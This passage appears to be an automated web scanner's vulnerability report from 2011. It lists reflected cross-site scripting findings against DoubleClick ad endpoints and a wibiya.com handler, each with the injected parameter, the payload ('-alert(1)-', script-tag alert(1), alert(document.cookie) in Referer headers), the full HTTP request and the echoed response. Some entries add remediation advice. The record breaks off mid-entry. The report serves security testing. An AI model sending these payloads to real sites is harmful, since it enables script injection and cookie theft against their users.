document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f2c'-alert(1)-'a56d4b9fc45 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457e7'-alert(1)-'caf99647365 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18bf3"-alert(1)-"7264eb482c2 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1262"-alert(1)-"37bb6a46aea was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy% ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3514'-alert(1)-'36e03f38f43 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy% ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43731"-alert(1)-"187433e4b2d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:44:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... escape("http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff622'-alert(1)-'d54c1daec2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:44:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... href=\"http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu ...[SNIP]...
The value of the mfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54760'-alert(1)-'16463c601ed was submitted in the mfg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_54760'-alert(1)-'16463c601ed HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 05 Feb 2011 22:27:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 368
4.16. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/oiq.man.homeappliance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e06e3'-alert(1)-'618b2b40360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_&e06e3'-alert(1)-'618b2b40360=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 05 Feb 2011 22:26:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 363
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19620'-alert(1)-'d06efb22ec was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_19620'-alert(1)-'d06efb22ec HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 05 Feb 2011 22:25:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 359
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 270ed<script>alert(1)</script>529ef0f2bb5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Handlers/newsticker.php?callback=jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5&url=http%3A//www.kledy.de/rss_dts.php HTTP/1.1 Host: appcdn.wibiya.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1286380163-1295459907704
Response
HTTP/1.1 200 OK Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 23:08:34 GMT Expires: Sun, 06 Feb 2011 00:08:34 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch Vary: Accept-Encoding X-Powered-By: PHP/5.2.6-3ubuntu4.4 Content-Length: 51609
jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5({"name":"Kledy.de | Aktuelle News","posts":[{"title":"Lottozahlen vom Samstag (05.02.2011)","description":" In der Samstags-Ausspielung von "6 aus 49" des Deutschen Lotto- und Totoblocks wurde ...[SNIP]...
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 115a8<script>alert(1)</script>512fdd36cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
